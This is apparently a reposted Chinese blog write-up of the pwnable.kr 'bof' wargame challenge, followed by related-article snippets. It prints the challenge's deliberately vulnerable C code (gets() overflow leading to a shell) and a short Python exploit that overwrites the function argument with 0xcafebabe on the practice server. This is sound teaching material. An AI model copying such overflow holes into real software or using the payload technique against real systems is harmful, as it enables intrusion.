pwnable bof

最新推荐文章于 2024-06-03 14:47:05 发布
最新推荐文章于 2024-06-03 14:47:05 发布
阅读量141 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/binshblog/p/6640914.html
版权

http://www.pwnable.kr/play.php

题目提供了二进制文件和源码,查看源码:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

提供给系统权限的条件是key的值为0xcafebabe,key是函数func的参数。overfolwme数组被gets之后可以溢出。

观察函数s也就是buf在ebp上0x2c处,那么我们只需要溢出0x2c+8个字节就可以覆盖到第一个参数的位置,然后覆盖为cafebabe即可:

from zio import *

def exp(target):
    io=zio(target)
    io.writeline("1"*(0x2c+8)+l32(0xcafebabe))
    io.interact()

target=("pwnable.kr",9000)
exp(target)

 

转载于:https://www.cnblogs.com/binshblog/p/6640914.html

weixin_30371469
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnablebof
qq_43430261的博客
10-18 348
看代码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafeb...
bof - pwnable
SkYe's Blog
08-19 420
bof - pwnable 1.获取题目 题目给出下载链接:程序文件;源码 2. 运行程序、查看文件类型、保护措施 在本地机上运行一下程序:运行提示需要输入一个passcode,随意输入一个密码提示Nah… 查看文件类型:是32位动态链接的elf 查看保护措施: 3.分析源码 因为题目有给出源码,所以先直接查看源码分析。 #include <stdio.h> #include &...
pwnable-bof
最新发布
wzbzdm的博客
06-03 865
可以看到overflowme的起始地址为0xfffd2e0 + 0xc = 0xfffd2ec。与前面的overflowme位置的差值为0x34即52个字符的长度。那我们需要填充 52个字符串 + 一个int就能成功。可以看出key的地址为 0xfffd320。查看当前目录下的文件,获得flag。连接远程主机并发送payload。通过exit结束调试。
pwnable 笔记 Toddler's Bottle - bof
HiTaQini
11-16 1908
缓存区溢出
pwnable- bof
just do IT
06-20 210
查看程序源码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xca...
bof.rar_BOF
09-21
【标题】"BOF.rar" 是一个以 MFC(Microsoft Foundation Classes)库为基础的示例程序,主要展示了如何在Windows应用程序中使用按钮控件。"BOF" 可能是 "Buffer Overflow" 或 "Button Of Fun" 的缩写,但在这个上下...
关于ASP eof与bof 区别分析
10-29
在ASP(Active Server Pages)编程中,我们经常会遇到处理数据记录集Recordset的情况,而`EOF`和`BOF`是两个非常关键的概念,用于在循环遍历数据时判断是否到达了记录集的边界。接下来,我们将深入探讨这两个概念及其...
bof_recognition.rar_BOF_filter bank
07-14
Filter bank representation methods for speech recognition
Java+opencv实现bof图像检索算法
05-22
【Java+OpenCV实现BOF图像检索算法】 在计算机视觉领域,图像检索是一个重要的任务,其目的是通过比较图像特征来找到相似的图像。本项目利用Java编程语言结合OpenCV库,实现了基于Bag of Visual Words(BOF)的图像...
BOF图像匹配-Python代码-计算机视觉
05-23
BOF图像匹配-Python代码-计算机视觉】 在计算机视觉领域,图像匹配是一个核心任务,它涉及识别和比较两张或多张图片中的相似或相同部分。Bag of Visual Words(BoF)模型是一种常用于图像表示和匹配的技术,尤其...
pwnablebof
qq_51979295的博客
09-26 188
栈溢出,给我狠狠地溢出!
pwnable.kr】bof
think_ycx的专栏
07-08 507
下载程序wget http://pwnable.kr/bin/bof wget http://pwnable.kr/bin/bof.c程序调用gets获取字符串s [ebp-2Ch]和传入的参数a1 [ebp+8] 比较,stack overflow padding:0x2C + 0x8。IDA pseudocodeunsigned int __cdecl func(int a1) { cha...
pwnable.kr bof
潜心学习
07-04 1170
pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之后两者之间的联系。 bof.c #include&nbsp;&lt;stdio.h&gt; #include&nbsp;&lt;string.h&gt; #include&nbsp;&lt;stdlib.h&gt; void&nbsp;func(int&nbsp;key)...
pwnable.kr-bof
qq_35661990的博客
09-09 232
#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key...
pwnable学习笔记-bof
网安星空
12-21 301
pwn学习,靶场为pwnable.kr,本片内容为bof,即缓冲区溢出
pwn学习:pwnable.kr bof
Richard_pl的博客
03-12 423
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
pwnable.kr --- bof题解
Yannie's Blog
12-11 1046
题目如下: 我们将文件下载,打开 我们下载完题目中给的两个文件,然后打开bof.c文件,我们可以看到源码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;string.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; void func(int key) { char overflowme[32]; printf(&
简单易懂的 pwnable.kr 第三题[bof]Writeupt
Y_peak的博客
01-29 404
简单易懂的 pwnable.kr 第三题[bof]Writeupt 题目地址:http://pwnable.kr/play.php 点开题目发现: 他给了提示覆盖,并且给了两个网址。分别打开,第一个给了你一个下载文件bof。第二个是文件的源文件。 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("ov
使用pandas BOF
05-15
在 Pandas 中,BOF 指的是 Business Offset,是一种处理时间序列数据的方法。BOF 提供了一种方便的方法来进行时间聚合,可以帮助我们将时间序列数据按照业务需求进行划分和聚合。 使用 Pandas 的 BOF,需要用到 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值